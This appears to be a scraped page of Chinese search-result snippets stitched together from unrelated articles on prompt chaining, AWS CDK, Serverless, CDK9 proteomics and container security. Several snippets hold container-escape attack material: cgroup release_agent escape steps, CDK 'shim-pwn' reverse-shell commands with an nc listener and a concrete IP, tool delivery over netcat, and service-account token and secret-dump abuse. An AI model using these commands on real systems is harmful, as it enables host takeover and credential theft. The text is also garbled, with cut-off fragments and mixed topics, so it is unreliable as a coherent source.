Prompt Chaining 的核心思想在于不是一次性给出一个复杂的指令或问题给模型,而是将大问题分解成一系列更小、更具体的子问题,每个子问题通过生成的文本作为下一个提示的基础,逐步引导模型向目标输出逼近...任务分解:首先,用户需要将复杂的任务或问题分解成一系列可管理的子任务或子问题。这些子任务应该按照逻辑顺序排列,以便逐步引导模型向最终目标靠近。...文件夹,并安装对应依赖:暂时无法在飞书文档外展示此内容2.2、通过 CDK 部署项目CDK(AMazon Cloud Development Kit)是一个开源的软件开发框架,其提供了一种声明式的方法来构建...准备好代码和依赖后,下面在终端输入:cdk deploy --all开始部署,部署大致需要 5 分钟:部署成功后,会给出预览的网址,单击链接,打开项目地址:项目的效果如下,其将故事撰写任务分为多个子任务...合并角色故事:在角色和故事情节生成之后,有一个“Merge Character Stories”步骤,将不同角色的故事线合并成一个连贯的故事。
项目名称:CDK 项目作者:CDK-Team 项目地址: https://github.com/cdk-team/CDK/ CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及...CDK为安全测试人员提供了golang原生的容器环境渗透能力,主要有以下几点: 评估容器内部弱点、搜集敏感信息。 提供多种容器逃逸的漏洞利用方式。 提供K8s环境的多种持久化、横向移动方式。...提供原生的进程、网络命令,便于测试者自定义攻击操作。 功能 CDK包括三个功能模块 Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。...✔ link kproxy kubectl代理转发 使用方法 下载可执行文件投递到已攻入的容器内部开始测试: https://github.com/cdk-team/CDK/releases/.../cdk run shim-pwn 47.104.151.168 111 docker.sock漏洞逃逸 通过本地docker.sock向控制宿主机的docker进程,拉取指定的后门镜像并运行,运行过程中镜像将宿主机的根目录
当容器具有SYS_ADMIN的Capability的话,则可以进行容器逃逸。它允许大量的特权操作,包括mount文件系统,交换空间,还有对各种设备的操作以及系统调试相关的调用。...-security-opt apparmor=unconfined --name=test nginx:latest 在容器中使用cdk进行检测,可以看到容器中多了CAP_SYS_ADMIN的Capability...在容器内挂载宿主机cgroup的memory #将cgroup进行挂载 mkdir /tmp/test && mount -t cgroup -o memory cgroup /tmp/test #接着我们在挂载的目录下再创建一个子进程...,主要攻击目标应在子进程内,因为攻击的过程需要将cgroup下所有的task清除,所以在同样环境的子进程内进行更加合理安全 mkdir /tmp/test/x 第二步就需要我们设置notify_on_release...该命令启动一个sh进程,将sh进程的PID写入到/tmp/test/x/cgroup.procs中。这里的\$\$表示sh进程的PID。
也欢迎各界朋友各种形式的合作! CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。...GitHub地址: https://github.com/cdk-team/CDK/ CDK 功能 CDK包括三个功能模块 Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。...CDK为安全测试人员提供了golang原生的容器环境渗透能力,主要以下几点: 评估容器内部弱点、搜集敏感信息。 提供多种容器逃逸的漏洞利用方式。 提供K8s环境的多种持久化、横向移动方式。...如果你可以在目标容器中执行命令(RCE),但容器中没有wget或curl命令,可以参考下面方法植入: 将CDK下载到你的公网服务器,监听端口: nc -lvp 999 < cdk 在已攻入的目标容器中执行.../serviceaccount/token) CDK将利用该凭据尝试认证K8s api-server服务器并访问高权限接口,如果执行成功意味着该账号拥有高权限,就可以直接利用Service Account
收集这些诊断工件有两种不同的机制:用于按需收集工件的HTTP API 。当您已经知道您的应用程序遇到问题并且您有兴趣收集更多信息时,您可以调用这些 API 端点。...ETW, eventpipe, lldb, dotnet-trace, dotent-counters 等可以查看 dotnet diagnostics.目标应用程序容器准备首先, 我们得让我们被调试的目标程序公开这个诊断端口...未作特别声明的话, 后文给出的实验都是基于AWS Fargate 和 Linux 配置....到此, 目标程序容器的配置就完成了, 接下来配置dotnet-monitordotnet-monitor容器准备增加 Docker image 作为目标容器的sidecar 容器.暴露端口52323 #...dotnet-monitor映射端口.增加容器启动命令参数 --no-auth # 简单粗暴的让所有的API都不要鉴权.添加环境变量 DOTNETMONITOR_DiagnosticPort__ConnectionMode
通过使用namespace,可以将不同进程之间的资源进行隔离,使得它们感觉像是在独立的环境中运行 用简洁明了的话来说,namespace实现了容器与容器,容器与宿主机之间的隔离 **而业内广为人知的**...User namespace:使得不同namespace下的进程可以有不同的用户和用户组ID,进程只能对相同namespace下的用户进行权限管理。...我们可以在容器内部创建一个新的容器,因为Docker Socket被挂载到了当前容器,所有我们可以将宿主机目录挂载到新的容器内部 即在容器内创建一个挂载了宿主机根目录的容器,然后将目录切换到根目录即可完成逃逸...host模式 接下来我们使用大名鼎鼎的CDK https://github.com/cdk-team/CDK/wiki/CDK-Home-CN 如何将CDK上传到容器内部?.../cdk run shim-pwn reverse [ip] [port] vps上面开启nc 反弹宿主机shell Docker 远程 API 未授权访问逃逸 docker的2375端口是干啥的?
User namespace:使得不同namespace下的进程可以有不同的用户和用户组ID,进程只能对相同namespace下的用户进行权限管理。...privileged 特权容器的权限其实有很多,所以也有很多不同的逃逸方式,挂载设备读写宿主机文件是特权容器最常见的逃逸方式之一如何判断当前容器是以Privileged 特权模式启动的呢?...我们可以在容器内部创建一个新的容器,因为Docker Socket被挂载到了当前容器,所有我们可以将宿主机目录挂载到新的容器内部即在容器内创建一个挂载了宿主机根目录的容器,然后将目录切换到根目录即可完成逃逸我们在当前容器内部安装...host模式接下来我们使用大名鼎鼎的CDKhttps://github.com/cdk-team/CDK/wiki/CDK-Home-CN如何将CDK上传到容器内部?.../cdk run shim-pwn reverse [ip] [port]vps上面开启nc反弹宿主机shellDocker 远程 API 未授权访问逃逸docker的2375端口是干啥的?
Kubernetes是一种开源技术,可以自动部署、扩展和管理容器,即容器化应用程序。 为了实现高可用性,EKS 跨不同的 AWS 可用区运行和扩展 Kubernetes 控制平面。...AWS Fargate:Fargate 是 AWS 托管的无服务器计算引擎,允许您执行容器应用程序而无需维护服务器。...托管集群更新 Kubernetes 的版本升级是即时执行的,无需构建新集群或将应用程序转移到新集群。...亚马逊网络服务 (AWS) 简介 如果您使用 AWS Fargate,价格取决于从您开始下载容器映像到 Amazon EKS pod 完成所消耗的 vCPU 和 RAM 量,时间计算将四舍五入到最接近的秒数...您可以根据需要购买不同类型的 AWS Outposts 机架配置,机架配置是 EC2 实例类型、EBS gp2 Volume 和 S3 on Outposts 的组合。
通过对静息和poly (I:C)刺激的肺癌细胞(A549)进行差异定量蛋白质组学研究,获得CDK9相互作用组的全貌。在CDK9互作子中发现591个蛋白,其中包括~70%的新型高信赖蛋白。...54中代谢活性弱的腙连接子,23中被稳定的脂肪族氨基连接子取代后,在保持CDK9选择性的同时降低了活性。 图13....有几项研究描述了CDK9在转录的不同方面的作用。鉴于CDK9在转录中的核心作用,很可能不同的异构体定位于不同的复合物,具有细胞类型特异性功能。目前,有充分证据强烈支持CDK9作为癌症靶点。...这种灵活性可能是CDK9适应不同复合物中不同结合环境的关键。因此,在任何特定时间,小分子CDK9抑制剂可能只针对含有CDK9的复合物的一个子集。...这些研究强烈反对将CDK9抑制剂相关的某些脱靶效应工程化,特别是那些将下调Bcl-xL等其他抗凋亡蛋白水平的效应。但是,某些靶外效应,如抑制正常细胞生长是不可取的,应该避免。
一般来说内网不会完全基于容器技术进行构建。所以起点一般可以分为权限受限的容器和物理主机内网。...Service间的通信 当我们起点是一个在k8s集群内部权限受限的容器时,和常规内网渗透区别不大,上传端口扫描工具探测即可。...: 运维人员配置不当,将system:anonymous用户绑定到cluster-admin用户组,从而使6443 端口允许匿名用户以管理员权限向集群内部下发指令。...采用CDK攻击 CDK(Container DucK)是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。...其中,10250端口是可读写的,10255是一个只读端口。 最常见的未授权访问一般是10255端口,但这个端口的利用价值偏低,只能读取到一些基本信息。
04 CDK 作者:cdkteam 开发语言:Golang github star:3.2k https://github.com/cdk-team/CDK CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及...并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动,效率高且不易被检测。...反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。...其基于带外应用安全测试( OAST)通过任务的形式,将不同漏洞场景检测能力通过插件的形式进行集合,通过与目标进行Out-of-bind的数据通信方式进行辅助检测。...,并定期将答疑内容整理发布,以供参考交流。
很多开发者基于对 Serverless 优势的理解,容易陷入“它是容器替代方案”的认知误区。而实际上,Serverless 与容器针对的是不同的用户需求。...直至 2017 年年底的 AWS re:Invent 大会上,AWS 宣布针对容器的无服务器计算引擎推出 AWS Fargate,云计算技术尤其是 Serverless 架构和应用的演进,才算真正迎来了一次新的机遇点...Fargate 不仅可以抽象出运行容器的服务器,还可以提供服务器编排的抽象,作为容器的免编排计算。...这也意味着,当 K8s 等容器编排工具的使用度越来越高,乃至成为开发中的一项“基础设施”时,开发者们可以将创建和管理容器的事情交给云服务商(Fargate)来处理,就好像今天的服务器虚拟化一般,容器也越来越...归纳来看,无论是扩充提供不同的服务还是丰富的开发者工具,AWS 都是尽可能地帮助开发者在应用 Serverless 架构的过程中,降低其遇到不同场景下处理复杂问题的难度,从而让为“高效”而生的 Serverless
Docker和服务器无状态化:容器化应用的优势 摘要 本文将深入探讨Docker和服务器无状态化的概念,重点阐述容器化应用的优势。...引言 Docker是一种轻量级的容器化技术,它可以将应用程序及其所有依赖项打包为一个可移植的容器。...许多云服务提供商都推出了基于Docker的无状态容器服务,如AWS Fargate、Azure Container Instances等。...Docker和服务器无状态化在不同领域的应用 Docker和服务器无状态化在不同领域都有广泛的应用。在互联网领域,应用往往需要面对大量的用户和流量,需要具备高可伸缩性。...通过将各个服务容器化,并采用无状态化部署,可以更好地实现服务的弹性伸缩和独立运维。
攻击者后续使用不同的账户推送带有挖矿程序的镜像,一直到 2023 年 3 月。...攻击者提供了不同版本的代码,以防止被 GitHub 搜索引擎跟踪。...攻击者利用该服务生成私有存储库,将其作为不同服务的源。这可以将攻击行为完全控制在 AWS 内。 repo.sh脚本在每个区域都会创建一个名为 test 的 CodeCommit 存储库。...ECS/Fargate ecs.sh显然是用于在 AWS ECS 服务中进行挖矿的,而 Amazon ECS 是一种用于管理和部署容器编排服务。...为容器分配 2 核 CPU 与 4 GB 内存,并且通过设置 “”requiresCompatibilities”: [“FARGATE”]” 将其配置在 Fargate 上运行。
文章前言 Kubernetes是当今最流行的容器编排工具之一,为企业应用部署和管理提供了高效、稳定的解决方案。然而在运行Kubernetes集群时,管理员需要对集群内的各个组件进行监控和维护。...本文将从不同角度介绍Kubernetes集群信息收集的相关技术,并提供一些实用的工具和方法,帮助管理员更好地理解和使用Kubernetes集群信息收集技术,进一步提升Kubernetes集群的安全性和可靠性.../cdk run k8s-secret-dump auto 安全策略 对于已经获取了kubeconfig或sa账号权限,进而想要创建特殊配置的容器,但是受到了K8s Pod Security Policies...端口服务 内部网络 Flannel默认使用10.244.0.0/16网络 Calico默认使用192.168.0.0/16网络 文末小结 总的来说,Kubernetes集群信息收集是保证企业应用部署和运行环境安全性和稳定性的关键一环...3、收集网络信息:使用工具(如Weave Scope或Cilium)来监视容器之间的网络通信,并检查网络连接和流量是否正常。
├ chrome //chrome浏览器 ├ masscan //异步传输,无状态的扫描端口工具 ├ OneForAll //一款功能强大的子域收集工具...进行CDN检测,之后不存在CDN的目标再利用shodan api进行端口检测以及服务识别的过程,然后将检测到的目标按照协议:DOMAIN:端口的格式存储到TASK表中,如果目标存在CDN则默认返回80端口存储到...在子域收集完成后,我们就可以进行端口检测过程了,这里我们默认使用的是shodan api,默认线程数目为10,其中masscan+nmap代码已经加入其中,默认阈值是50,只需要进行简单的代码上的调整就可以完成应用.../lib/config.py中修改这一限制,如果你是通过手工安装,你可以通过访问http://127.0.0.1:5000来查看这一页面,如果你是 Docker安装,你可以通过Docker命令将它映射到宿主机的相应端口上...OneForAll - 一款功能强大的子域收集工具 2.
提供注册域名并将记录自动指向运行隧道的服务器。 自动设置和管理域名的 HTTPS 证书(顶级域名和子域)。...提供客户端工具,通过服务器进行 HTTP/TCP 连接的隧道,无需在客户端 root 权限。 提供简单 GUI 界面,允许用户将 X 域/子域映射到 Z 客户端上 Y 端口,并代理所有连接到该域。...提供高级语言,抽象低级加密概念,便于将私有应用程序集成到堆栈中 编译为电路,使零知识证明实际可行 受传统编程语言(如 JavaScript、Scala 和 Rust)影响,在易读性和易用性方面具有很强的重点...在 Rust 中编写的 Python-3(CPython >= 3.12.0)解释器。 可以在 WebAssembly 上运行在线演示。 支持 JIT 编译器,将 Python 函数编译成本机代码。...License: Apache-2.0 picture example-voting-app 是一个示例分布式应用程序,由多个 Docker、Compose、Swarm 和 Kubernetes 容器组成
CaaS - 容器即服务 当我们创建容器后,把它扔到 CaaS 上,它就会自动运行、服务和扩展,比如 Azure Container Instances、Google Cloud Run 或 AWS Fargate...FaaS 可以用不同的方式来运行你的代码,一种方式可能是 FaaS 为每一次代码变化构建一个容器,就类似于使用 CaaS 这种服务。...FaaS 构建成容器发送给 CaaS 另一种方式是 FaaS 在启动过程中动态地将函数的源码拉到一个预定义的环境(容器)中,不同的语言会有不同的环境,当使用像 Go 这样的编译语言时,那么编译必须在启动时进行...CaaS - 容器即服务 可以看到我们大大减少了需要创建的 Kubernetes 资源清单的数量,CaaS 将为我们创建所有必要的子资源,比如 autoscaler、Ingress 或 Istio 路由...虽然 Pods 的容器不是运行在虚拟机上,而是在云提供商的无服务器容器产品中,如 AWS Fargate、Google Cloud Run 或 Azure Container Instances。
预计 Serverless 架构将引领云计算的下一个十年已成为共识。这个 Serverless 不仅适合与小场景,同样适用与大厂秒杀,12306 抢票的大业务场景。...典型的 PaaS 平台需要提供手段让开发者部署和配置应用,例如自动将应用部署到 Tomcat 容器中,并管理应用的生命周期。...很多应用都要自己编写实现注册、登录、密码管理等逻辑的代码,而对于不同的应用这些代码往往大同小异。...ASK 和 ECI;AWS 有 Fargate,基于 Fargate 有 EKS on Fargate 和 ECS on Fargate 两种形态;Azure 有 ACI。...集群创建完成后,接下来我们部署一个无状态的 nginx 应用,主要分成三步: 1.应用基本信息:名称、POD 数量、标签等; 2.容器配置:镜像、所需资源、容器端口、数据卷等; 3.高级配置:服务、路由
,然后将宿主机的根目录挂载到当前目录中(这里如果不存在特权用户,但docker容器配置不当-进行危险挂载,是同样的风险,之后可以用相同的利用方式)。...简单来说就是:docker容器以--net=host 启动会暴露containerd-shim 监听的 Unix 域套接字。特定版本的Containerd未做权限控制,可以实现提权。...是否能获取containerd-shim 监听的 Unix 域套接字:cat /proc/net/unix|grep -a "containerd-shim"3、漏洞利用以--net=host 启动容器直接下载...exp并解压https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz在kali中开启监听,并执行exp...成功接受到shellPart04 如何防止docker逃逸1、避免使用特权模式启动容器,或者限制容器所需的最小权限;2、避免将宿主机上的敏感文件或目录挂载到容器内部,或者使用只读模式挂载;3、避免将Docker
领取专属 10元无门槛券
手把手带您无忧上云